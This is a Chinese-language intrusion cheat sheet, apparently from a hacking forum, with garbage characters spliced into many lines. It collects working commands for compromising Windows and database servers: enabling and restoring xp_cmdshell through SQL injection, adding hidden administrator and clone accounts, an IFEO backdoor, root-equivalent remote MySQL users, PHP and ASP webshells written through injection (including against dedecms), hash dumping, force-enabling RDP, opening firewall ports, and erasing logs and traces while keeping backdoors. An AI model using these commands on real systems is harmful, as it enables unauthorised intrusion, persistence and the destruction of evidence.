: m r! d! l, l9 f4 C5 P& {# X! W1.net user administrator /passwordreq:no
6 S L5 h! r0 _$ O7 v4 s" S" L! j' Q这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
, n4 m9 f8 a6 u4 R/ v2.比较巧妙的建克隆号的步骤
: m4 H7 K, a! r先建一个user的用户( k3 p3 z# Q$ p& f0 a( P3 c) }
然后导出注册表。然后在计算机管理里删掉; N$ v8 W% J# m! y+ Q1 D+ @$ R
在导入,在添加为管理员组6 i% L6 y* [: _' u
3.查radmin密码
2 r7 B' c% ^" T6 `+ \. O4 Jreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
) n# N; G2 T# x& L' |5 W- ]4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
/ |" e2 a! X; E( t* C3 _+ @ C建立一个"services.exe"的项
$ O S7 h' C6 I. S再在其下面建立(字符串值): f: |; \3 ]9 q# }. ^
键值为mu ma的全路径
/ Z, }2 R3 v/ p" w! J5.runas /user:guest cmd$ d7 E1 M/ s; z9 Y1 h
测试用户权限!. l( Z0 H0 W: O! V2 s# D/ E. |
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
- V. C' w! X i) x, B( ^1 s. z7.入侵后漏洞修补、痕迹清理,后门置放:& |( K; J$ M$ |; p
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
' e# @, q6 y% X' P- c8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c# J6 Z4 ~5 m7 W' _5 S& C: k3 P
" y2 X6 K% B: _
for example
1 o: @/ Z2 D2 t" C/ e9 T% w0 W/ P5 U( l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
$ ~& |! p! p g" r( [! k# }! P! o. m/ x3 B! r r% n4 `. L* S% S6 p7 W9 ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
_, v8 \7 a, r) m4 S' O1 |& T
! O+ S& ^. v0 r- W# K0 w4 Z; A. e9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
1 z9 N K8 Y: N& f- R如果要启用的话就必须把他加到高级用户模式$ O0 P8 z3 Q) b+ B# n
可以直接在注入点那里直接注入
/ Z. f$ W& j+ s. L Kid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
0 K0 S0 v1 m0 v, b+ _然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--; C- G: F! L- U, I: z. e
或者0 f6 U6 d. g# `& v1 p4 W: `
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
Z9 b y5 J" m1 u0 k0 g+ k来恢复cmdshell。
5 e I* p5 E# ]; T, W
$ b% q* Y: P# X0 i1 l分析器: j/ d. e' j+ N# m& P3 A2 {6 n$ n
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--) C* |$ T; p& O+ U/ F7 J! p- F0 q7 @
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")/ F! Q. {, s! Q2 }
10.xp_cmdshell新的恢复办法
?. G/ _ ^( K* Axp_cmdshell新的恢复办法; G! H+ S; }& X, H. n0 ~/ }, R; T
扩展储存过程被删除以后可以有很简单的办法恢复:
+ T' {7 B3 \: |+ t; K. t# m7 N删除
8 F; f% Z* D) U4 L4 Edrop procedure sp_addextendedproc( k& X) H5 y4 Z+ L
drop procedure sp_oacreate1 o1 Q- ^2 _+ k- ?& R
exec sp_dropextendedproc 'xp_cmdshell'
0 S& c8 o( m6 \. A2 f6 z; o- X! o/ H' p7 k
恢复
9 k: `6 Q. u$ s1 mdbcc addextendedproc ("sp_oacreate","odsole70.dll")0 b* I. M9 i" {4 ~; S! J% k
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
# u0 A; e$ n4 R( Y! _; m3 a( o+ T! g8 `, V* ~
这样可以直接恢复,不用去管sp_addextendedproc是不是存在8 o0 u% z+ Z: v: w7 c6 ], p
: _+ I S( ]5 A Y8 S/ r-----------------------------* i, b+ X2 K/ U, Q/ e5 G' s0 V
1 `' n1 T$ F1 j' Q/ \删除扩展存储过过程xp_cmdshell的语句:: l) Q. I% H" v8 o
exec sp_dropextendedproc 'xp_cmdshell'$ N+ e; P$ F7 m+ x* ?" o
6 X4 d: n, B* O: C, b `( ^- k/ H恢复cmdshell的sql语句
/ \; P8 u+ b w gexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'5 C0 N4 V9 ~( b) O* w- c/ \- m
& O% f5 G, l6 T }" k
. T$ w/ A, ] N8 T1 G! c
开启cmdshell的sql语句
8 w/ p, a" n1 M# A0 B# ]6 @* T) D' d* `- r) ~% a% u
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
+ _2 E V, b) u/ M3 k- @( C+ y: B$ ~4 B- N! @
判断存储扩展是否存在
" U( A& T% M6 V# h; Z. N8 Y" P* Eselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
6 X3 A8 n6 B+ J/ m: k. G+ ]返回结果为1就ok
6 g) A( N, U. o: ?# I) G4 O
. Q- F8 f) A5 n恢复xp_cmdshell
: p7 x/ g5 i( S4 d1 R2 F+ F9 r8 Texec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
$ ?# @1 g. H6 f u# D/ ^, D返回结果为1就ok5 ^% N$ [$ X, ^! R% w
7 |* R; ]# G( g1 P7 j( r6 y
否则上传xplog7.0.dll
! ^5 o) \+ \1 r4 }1 {exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
8 m) T: C; }0 L/ P, u" \ g* [: Y2 U
堵上cmdshell的sql语句
% I a, a/ X5 D. u5 Ksp_dropextendedproc "xp_cmdshel) u6 q* ?- ~5 w) F: |; Q
-------------------------
/ N% ^3 u% a$ _2 Z3 T/ S清除3389的登录记录用一条系统自带的命令:+ ^, j* N; S, }" ?
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f" V/ w( F+ m/ r6 K' T! C3 `& q7 v- j
: e5 ]9 c/ U, h6 v
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件; J% Z2 S( A* u# a6 V
在 mysql里查看当前用户的权限+ ]$ M# T! c7 u0 D& K
show grants for J0 O; T: V5 x; z! i
/ o- u$ q4 e1 s+ Z以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。: f4 c2 Z( D9 A* y4 A4 s
. v. K' Q" z( f, i+ T; r
: j4 `1 O9 q) t- j* V5 B5 MCreate USER 'itpro'@'%' IDENTIFIED BY '123';( U, a; l9 z( c, x2 h9 I
" i' D$ b% C' B) S" \0 xGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION) O. g% g" a8 L# X" O/ ?: [
1 _) {. |* [' J) G2 y" ?3 n6 @MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
- p, _! ~. {. z% P
6 {* M+ d: \) D5 ]6 {- m# r7 iMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
( V0 ~* l G9 a& d
/ C6 `' H' A6 }# G8 n3 K l搞完事记得删除脚印哟。" x$ A2 y& b# }+ c! g
! x* E1 V, l6 r- [# |: Q! ], Z. N
Drop USER 'itpro'@'%';1 R# {8 m0 Z" F' b* x, \
3 U% ^0 J0 |. x
Drop DATABASE IF EXISTS `itpro` ;
. s' \. `" Y( |7 J
7 v6 [9 R( H) Z& ]当前用户获取system权限 Y' f/ \. x* @2 ~# J4 O: g5 N* n
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact$ n2 A: r5 ~7 q* c' t" o
sc start SuperCMD
+ ]* S5 [8 Y( M6 n ^程序代码
3 w, n* R0 T @: l<SCRIPT LANGUAGE="VBScript">5 P) E! k0 q8 q5 M+ |
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
) G0 ~7 P2 A" m' Z2 {8 Fos="WinNT://"&wsnetwork.ComputerName
3 P! q$ k3 l6 eSet ob=GetObject(os)
9 k$ h g2 @ U& G2 c2 eSet oe=GetObject(os&"/Administrators,group")! b1 c) @+ k, u3 N8 R* d
Set od=ob.Create("user","nosec")
2 e1 M( [: [" p7 Sod.SetPassword "123456abc!@#"7 L+ h0 }6 B% r
od.SetInfo
4 T7 P' n$ W5 {( t; u* GSet of=GetObject(os&"/nosec",user)
2 v- h- H$ x$ e- `* _oe.add os&"/nosec"
& Y$ I/ X, I7 |, r1 @</Script>& }5 a+ R2 U8 ^5 E' T6 Q
<script language=javascript>window.close();</script>
- b; x- l9 k2 u1 g$ A0 b- l2 O9 a' G) d# l. e# w, j8 Z
. x1 P! z' W t0 G! Q: N6 Z- l- Y0 D' B/ w
K2 O/ y; o1 D( u
突破验证码限制入后台拿shell6 u% \/ Q( Z2 Z9 q& g
程序代码
& n" g1 q+ z% C" j2 s& oREGEDIT4
; p \. s: G% T/ R: c/ B# r" `8 I[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] # s$ v* m4 F8 e
"BlockXBM"=dword:000000006 X" P* S i: @/ p6 o6 s
/ z% [+ T$ b! q9 }4 @: c9 d保存为code.reg,导入注册表,重器IE- p* B+ W/ M! u @( V! Y, p& o7 T% W
就可以了" n! {2 Y2 Y' Q3 l9 ?5 X
union写马
" {: q3 u7 p7 X9 Y# R- ]程序代码# E' I, h9 b1 P( f8 ~2 V! g+ w+ v
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
1 T* I2 x0 M/ A) D7 K7 _* F; Z# S; r1 S: w' x2 u
应用在dedecms注射漏洞上,无后台写马
( l1 W0 h7 X+ J! l: y5 s' Xdedecms后台,无文件管理器,没有outfile权限的时候
/ |5 m8 D- r% K) N7 I在插件管理-病毒扫描里# u% l% C; W2 b/ f- q0 m+ ~" x8 ~- V
写一句话进include/config_hand.php里
* J5 x5 d( g, R6 b$ A程序代码
; \. I2 O! j* C4 M6 {>';?><?php @eval($_POST[cmd]);?>. g/ f- ^- t: }5 d6 }/ y
, l. A w. @' ~% Q5 y
! g2 c7 W2 y% `8 i* Y如上格式
9 x+ U# I9 f+ u7 l
/ C5 O4 `: t: R: Q* @oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解9 q7 U4 q+ o- k2 }/ E
程序代码
$ K! p) I% p$ U: Iselect username,password from dba_users;$ ?/ \" L2 q0 c" ?* n
' ~* b3 \, ]- x" D0 @1 m; {2 K6 Y" U: `# z3 k
mysql远程连接用户6 p) k8 b0 B$ l# \8 [4 C: ?
程序代码$ C6 V1 z: w$ a( F
4 P+ D% I3 l! Y1 P- i( aCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';3 f9 X- R6 A0 R- Y0 z0 F
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
+ m/ c0 G3 s! S+ g% ^ yMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 06 c- O' L5 f& Q3 g( v. V
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
% ]) ?2 l1 M9 @! ] }' h% N9 | e- E; z$ H" f* v# `
. h' f* _1 y7 I$ J: S3 U
# S+ I* R5 t1 e8 c+ G1 k7 v4 \& i' I0 V5 j: p7 }
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
9 K" O+ U3 L* H) |# D
% o/ B# f6 X- q; h* j+ w% x1.查询终端端口 M2 \: d$ b. P; G* f
5 S! f. v& |; ~: |- k( z$ ~
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
t$ f1 v e' W: M1 F- U" E& Q1 Y% C& M0 M* t
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
& t4 n$ {; i& u6 u7 F" wtype tsp.reg2 ^3 ?; c; s5 }3 u: U9 w% m2 t
& I1 @ ^; x* ]
2.开启XP&2003终端服务
, V' } f0 S7 C! A: ~3 Y# Q! L
# P+ P1 B) P- l+ q9 u m5 J/ f) B$ n5 D; ?- G0 c
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f- N/ u& G: Y" \6 z, r
8 I$ \. M" W/ F1 F
+ {) p t1 A$ Q9 v7 }REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f! k3 q2 w, d( o( p
4 y6 [' f6 U, E: e: C+ k. x( T6 |3.更改终端端口为20008(0x4E28) t6 w. T$ |2 H$ C
- q) Q( D. K1 v1 G5 t5 w- S
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
; y, ~9 x; F. C- \1 B6 @
7 q6 E8 l2 J- D$ C& N: p8 ]. J f* IREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f( B% d& E5 q) b. J9 k6 c1 b
0 d ^$ q( q' {6 t5 a* \
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制; d |; l- G9 B( O
+ ^$ i& d+ s4 nREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f: X4 ]/ J5 J# h0 r% Q7 u$ y
" Y( z4 ~ x8 v0 j
5 @! L* q: k g( P# H
5.开启Win2000的终端,端口为3389(需重启)- G" {7 j3 O5 x8 K* n% t6 x
& y; L9 u1 a+ e# `$ K1 |" \! |echo Windows Registry Editor Version 5.00 >2000.reg
2 Q: Y2 |, ?: u3 Vecho. >>2000.reg6 r) A* r+ w. I
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ( g) K8 m U; j! C! p* Q
echo "Enabled"="0" >>2000.reg
5 \8 Y6 m9 }$ |6 {8 G1 Hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
- Q* m# E: x2 A+ b8 Z* W( techo "ShutdownWithoutLogon"="0" >>2000.reg
+ W' H* T* t5 e8 m1 G* T: mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg / b0 J7 k) J- t* N
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 4 x4 k$ |4 W. K+ q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 9 H: ^1 R6 A; A, g5 C0 R
echo "TSEnabled"=dword:00000001 >>2000.reg t2 K8 h' G& R# ~( j& y8 a2 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
. p3 {$ ^+ p: ]0 j# ~echo "Start"=dword:00000002 >>2000.reg 5 q D ]8 J5 e" N9 N6 J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 2 W- C( @' T7 t0 Z; ]
echo "Start"=dword:00000002 >>2000.reg W( Q9 x' e! w- z! t
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
) i# X2 A, ~8 D7 necho "Hotkey"="1" >>2000.reg , c) Z. m9 A6 B% P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
( w% r. V e6 p( recho "ortNumber"=dword:00000D3D >>2000.reg . v! P" a: J+ |, N- {* ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
) r; m9 J5 `. j9 G4 N1 }- Decho "ortNumber"=dword:00000D3D >>2000.reg
$ [. E+ }! S. |' R1 }$ k: T! g L# L4 x i& r# f5 e* L1 Z" z
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
+ [3 q6 S" ?7 j: o8 q9 Z9 m' B1 X
3 X0 P8 F% I2 O4 c3 I0 p) c5 H@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
" x2 n& R/ V! J. f(set inf=InstallHinfSection DefaultInstall)/ y# F0 s# F' T
echo signature=$chicago$ >> restart.inf
' x7 _# o+ }7 \$ iecho [defaultinstall] >> restart.inf- y. M: E7 q5 |+ S6 I* w
rundll32 setupapi,%inf% 1 %temp%\restart.inf+ i$ l% {" R' R! K; M
8 i6 H0 F" e1 D! m; s/ w! c, F7 H/ R8 U. e" g
7.禁用TCP/IP端口筛选 (需重启)
" Q9 n9 }: g8 t9 E1 y0 n' l
1 e! O ], o5 R* u5 SREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
, W! ^! u; f5 k: y3 I6 {- ~5 K% A/ K, R- |- w* R
8.终端超出最大连接数时可用下面的命令来连接1 i1 Q+ K2 q" V% I, l" J
4 R, H9 @( P k. c: imstsc /v:ip:3389 /console0 T' E0 b# ~1 J! o$ f- f6 K
" R1 a( r3 [. b2 p g8 @4 ~7 f% s9.调整NTFS分区权限
, c8 E4 T$ g$ t4 W6 ?% n- L8 X. z$ |$ O! e! O
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
2 D4 O+ K3 R+ E1 o* b# l+ s) b, d& t, g6 G& j5 f8 @
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
4 H: z# q+ s- p7 T' K$ _4 @- G. b
- d7 C6 }. R" C- e" x------------------------------------------------------+ p# j" D$ t y3 d4 ?+ a, T( O
3389.vbs
6 d4 l$ V- Z& c; \On Error Resume Next3 d6 j5 A9 \- A% ~ j* W
const HKEY_LOCAL_MACHINE = &H80000002
1 O: {7 W, g4 Q* ~( Q) _( R4 sstrComputer = "."5 F1 S( i/ B8 {1 M4 L" ]) H3 i9 m
Set StdOut = WScript.StdOut
& B! \6 A6 o/ l- }* h% |" @2 D9 WSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
8 S) n$ _* r' |0 M" P2 pstrComputer & "\root\default:StdRegProv")' K# h/ U8 n# u, t2 \5 D" ^
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"; @; X6 V+ j0 o" Y) F7 r7 N
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
$ i0 L/ q: ^! ]1 p0 _+ E$ _strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
/ R' e) C# X/ l) o+ Y0 \0 toreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath# }: y6 F. [5 S8 S" g) L9 \% B
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
2 M* {: Y5 j. _9 v6 m& p8 ystrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"$ } g7 v. a7 \" l
strValueName = "fDenyTSConnections" `8 ]# A! c+ F$ v( U- l$ V
dwValue = 0
% i J$ u; d1 i* w3 soreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue C. s, w9 L1 z* ?* D6 S8 c& b
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
) `- _3 p+ A+ _% s# X- CstrValueName = "ortNumber"1 P& N8 W9 {) Z7 x
dwValue = 3389
- ~: _! r/ }* [7 q2 k2 xoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
4 Y% @$ e' J7 k) jstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"$ U* k$ P& b0 H6 j \' H% a2 C5 E
strValueName = "ortNumber"
' Q8 Y# Z. `0 F n& sdwValue = 3389: h4 r0 e/ s( {, y; F. r6 {
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue4 l$ u* y) D. K) f" d' \1 }
Set R = CreateObject("WScript.Shell") . S7 @* ]4 ?' Q( Y4 o
R.run("Shutdown.exe -f -r -t 0") 4 i" o0 g! A2 a& Y
4 @9 w6 x b5 N5 R. _+ m6 y7 S+ f8 y
删除awgina.dll的注册表键值
5 ?$ |# q; K- ?8 Q4 W$ J ]程序代码- [6 V- Z7 p$ h
9 _. v: @2 u4 |
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f+ x) o/ U5 K* ?: Z: `
, f7 R0 D3 F( f& A+ o% W# ]$ l& ~, d% z) {" @9 H0 W
3 e5 l8 n- x8 {& F8 ]. L
" h+ O* ~6 i* u/ ^ ~+ A
程序代码& I( z. c. v0 } z1 o* L+ g% y
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
+ m$ r( E0 j6 L% i \( K9 {# r& x& K9 b, X
设置为1,关闭LM Hash1 E3 j- b/ _# ^+ Z/ w4 y
- A! I- [9 C$ H% B
数据库安全:入侵Oracle数据库常用操作命令
6 U; ~* c" _# U最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。2 w' B; }* ~6 V% \# q
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
. i; M/ H( ~! }) Q2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
" _2 }; g& c* s- U T3、SQL>connect / as sysdba ;(as sysoper)或
, a3 u0 |3 h9 v3 Y, a2 J$ m2 mconnect internal/oracle AS SYSDBA ;(scott/tiger)" G9 p {/ k0 Z' u) ?1 }" O6 Y9 S; ^
conn sys/change_on_install as sysdba;9 ^0 x2 h5 Z" h7 [1 ^9 c
4、SQL>startup; 启动数据库实例
' e& |; ~ a* B+ u/ X% N8 Q5、查看当前的所有数据库: select * from v$database;
- v" J" q5 n( `0 k8 ^select name from v$database;5 D& w8 S( H1 I. F
6、desc v$databases; 查看数据库结构字段
( F+ r# N# {: r5 ~" K8 e7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:- {4 Y: P0 Y5 B9 k$ |
SQL>select * from V_$PWFILE_USERS;" K0 a1 f0 {6 i
Show user;查看当前数据库连接用户1 D3 [) ~; N: U. R
8、进入test数据库:database test;: t2 c" N% ~; D, B1 \! |
9、查看所有的数据库实例:select * from v$instance;
9 x/ L6 Q" m1 a$ ?2 x" l0 S# n如:ora9i0 h2 h( C5 |; |
10、查看当前库的所有数据表:
. @7 I/ t. A- P/ \# _SQL> select TABLE_NAME from all_tables;
) F; L- U( \" `/ \ V: `select * from all_tables;
9 I& E% H# S5 ~SQL> select table_name from all_tables where table_name like '%u%';
- N8 K$ }- f- y/ A5 q5 |, BTABLE_NAME2 R3 Y: N' y6 A9 I) k% c1 F
------------------------------% H6 k8 M% p/ B p- ?+ Q! L" T9 U) U% O
_default_auditing_options_" X, E( c1 P* i9 H3 ~; I4 l* W
11、查看表结构:desc all_tables; N( N) p C1 S3 S" ~: R
12、显示CQI.T_BBS_XUSER的所有字段结构:8 I; o" Y8 O4 }3 N7 Q& K- {7 r
desc CQI.T_BBS_XUSER;
9 n' @% P; y8 T2 z( x% h13、获得CQI.T_BBS_XUSER表中的记录:
0 [5 B- z0 h! w5 aselect * from CQI.T_BBS_XUSER;
$ q3 @ b" ?* k1 `, ^& Y, c \14、增加数据库用户:(test11/test)
3 h, \! Y! h1 f( Bcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
* j6 U! h4 }' t6 j$ P% T15、用户授权:
0 N. k0 j) F& {; i# mgrant connect,resource,dba to test11;4 y& v8 T# x( H/ K
grant sysdba to test11;
+ V& H' f) E+ f4 hcommit;
/ b+ p. x# @" C4 y E6 j' B3 x16、更改数据库用户的密码:(将sys与system的密码改为test.). Z: h: @! |7 l& t
alter user sys indentified by test;
9 j& L: r& @: @; t v* C+ ualter user system indentified by test;( F# C' x. M, A2 _1 a0 Q+ [1 B
$ c' g \/ l% E) c3 |applicationContext-util.xml% w) Y a% T) ]8 l: Z1 T
applicationContext.xml
+ O* ]/ t2 u; S/ r4 ]/ I. U3 rstruts-config.xml; d4 b2 i) _3 r' H
web.xml
) U, y x/ X2 M) J2 Mserver.xml/ L W4 J# N5 r! Q; C1 V/ Q4 Z- @7 m9 j9 R
tomcat-users.xml! {; P0 a& K! V& }' f z
hibernate.cfg.xml
# t" \" e" v4 O h$ J3 y9 }" Hdatabase_pool_config.xml1 i& K# B" x" o2 N
9 c) x; u. h2 O
8 k6 _, {; F$ x' P9 s\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置; R8 m- e& @/ G5 l( A0 O
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini& Y4 l& a4 P3 }0 Q+ J# o
\WEB-INF\struts-config.xml 文件目录结构' |: x9 H( _' w- s9 D$ \2 d8 k
: N6 d1 I# _, n
spring.properties 里边包含hibernate.cfg.xml的名称1 J$ I- `( k/ N2 a( c6 v; [# ]" R& F
1 F" Q+ Y# A5 d% w5 L: h7 Z# o2 J5 W+ P+ u) s8 d' v( v
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml: f0 A6 \" d. ?
+ d! ?, _6 e) [1 N+ {% T如果都找不到 那就看看class文件吧。。5 ]# D# l8 b' l+ Y' O( `; R
" W0 h' M, S: C: q8 K* F( Y
测试1:
$ a5 u/ X. n i" v5 H& y& a$ wSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
5 }9 P; E; J) K% |+ d
2 g3 w2 z( b/ U测试2:
5 k& B5 P! C) e8 x
, G* q+ }: z& E% p; I w6 Y7 ~4 mcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
8 t0 F) t' z7 S0 w! U( j" ~* j' q0 X* Y- f# o9 Q; T6 H
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
7 b2 T: d1 f9 d- K
6 C3 w6 _9 F- Y$ o' |! Y. X" A/ CSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1- v: [& t) n5 r' M# u
; z( t `6 N& v9 A" s9 A查看虚拟机中的共享文件:
. g! f& I/ L" O% d9 x9 F; d在虚拟机中的cmd中执行; S, I. j% ~1 N" z1 i' w* } P
\\.host\Shared Folders0 S# {4 a! k, L% J( C+ C; l
N& k/ o+ j7 o( {6 w% `+ n" |* J7 o
cmdshell下找终端的技巧
T8 e9 [1 c7 f0 q! y找终端: 8 d- M# I+ }- Q% B) s
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! " I$ P9 T) m! d
而终端所对应的服务名为:TermService ! ]- h0 l @, l! B% ]; }
第二步:用netstat -ano命令,列出所有端口对应的PID值!
6 N6 o8 x0 D }) b0 ~ 找到PID值所对应的端口 }; s' I0 c( x9 C' i$ E
7 z8 A0 a: D4 j
查询sql server 2005中的密码hash$ o+ B: P4 N8 D8 _/ D
SELECT password_hash FROM sys.sql_logins where name='sa'# E8 e6 q* R# P+ k% g: F0 T' B
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a! w" s4 L# |4 L& r) h' s' D
access中导出shell- M/ I( B5 ~; L
